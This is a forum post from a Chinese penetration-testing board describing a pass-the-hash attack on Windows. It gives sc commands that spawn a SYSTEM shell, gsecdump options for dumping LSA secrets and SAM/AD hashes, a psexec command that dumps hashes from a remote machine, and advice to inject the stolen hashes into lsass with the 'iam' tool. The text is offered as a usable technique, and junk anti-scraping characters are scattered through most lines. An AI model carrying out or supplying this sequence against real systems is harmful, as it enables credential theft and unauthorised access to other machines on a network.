找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 HASH注入式攻击
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1880|回复: 0
打印 上一主题 下一主题

HASH注入式攻击

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-11-6 21:09:29 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
o get a DOS Prompt as NT system:
. E3 x7 N# @0 @( [4 W
0 ^: G8 G4 D: g. H3 f1 {C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact* o& s: _1 _5 \* J+ n) b, J
[SC] CreateService SUCCESS
5 j8 e3 _4 X+ q9 h4 |/ Y0 T/ G4 `' Y  N
C:\>sc start shellcmdline
4 C$ P% N' J# k" d3 u2 L8 N7 q" J[SC] StartService FAILED 1053:
% [* D% C' |3 ]- o# `9 u1 E" \, ?* k# C
The service did not respond to the start or control request in a timely fashion.
! }$ f+ i- Q, G8 E4 A; J' t7 b7 G$ q
C:\>sc delete shellcmdline  f9 R2 ~% N$ N" G" ~- L
[SC] DeleteService SUCCESS
! o' _( @0 i% ?" u2 a
- H& z) P* x$ B8 `( o------------
) S: Y$ K# K$ ?8 S' X* f0 R; [% O  R7 J
Then in the new DOS window:
) M# f4 S% q" J
' f& f+ Z/ Q: QMicrosoft Windows XP [Version 5.1.2600]
0 E0 {' c2 t% p(C) Copyright 1985-2001 Microsoft Corp.
+ |$ |; ]+ N5 @9 i; ^3 p
3 ^7 H5 t" o: ?4 G9 M8 s8 JC:\WINDOWS\system32>whoami& \. c6 O4 X& i& \/ i& [5 s
NT AUTHORITY\SYSTEM* w' s1 ^9 w+ x8 A# i
, S: v2 {! R8 K
C:\WINDOWS\system32>gsecdump -h
9 ?& W8 w# E- x. Z/ @gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
3 d3 ~) ~$ F9 Yusage: gsecdump [options]: y: F6 U+ N; u" \9 z

6 {  P6 I, n! ~$ |options:
0 }% n, O! U+ f3 H0 Z$ u-h [ --help ] show help0 @- {% _7 ?/ v3 W2 B
-a [ --dump_all ] dump all secrets
: a& t+ f9 y9 {5 d-l [ --dump_lsa ] dump lsa secrets
* Z* q, R: W2 r) R-w [ --dump_wireless ] dump microsoft wireless connections1 H; `, u: I/ F3 _
-u [ --dump_usedhashes ] dump hashes from active logon sessions' o- H) F0 \! p1 |3 T
-s [ --dump_hashes ] dump hashes from SAM/AD3 A1 k+ F/ x' g& U* C1 g1 i5 p9 \
; Z0 u8 f" l  J; s
Although I like to use:
0 T9 P/ b  B; G. n* d
# B- O+ r7 K9 X( Z! ^( aPsExec v1.83 - Execute processes remotely2 j/ @4 J$ K* e5 o/ G; t4 g
Copyright (C) 2001-2007 Mark Russinovich5 @5 T; G; ]7 M4 A, T% z
Sysinternals - 链接标记[url]www.sysinternals.com[/url]
- ^+ }+ Y2 E5 k' J- {9 @& G$ m* Z5 \: I9 P5 c. t: X$ S4 L
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT# g0 Z6 y& a& _
) T. B1 O" b2 j/ A, v2 L+ e+ e
to get the hashes from active logon sessions of a remote system.
' q3 I$ x: p) k5 \# V! z% e7 v" s. X. V
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
# w+ n4 P! u; L) X
5 ]+ W/ C% }. ?: V提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
" C  S( Q% G4 C原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]% N" T/ B; O2 N! M
% K' H" S. \) K4 w1 l" p
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。+ V. E/ P2 O8 ]1 _9 ?
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表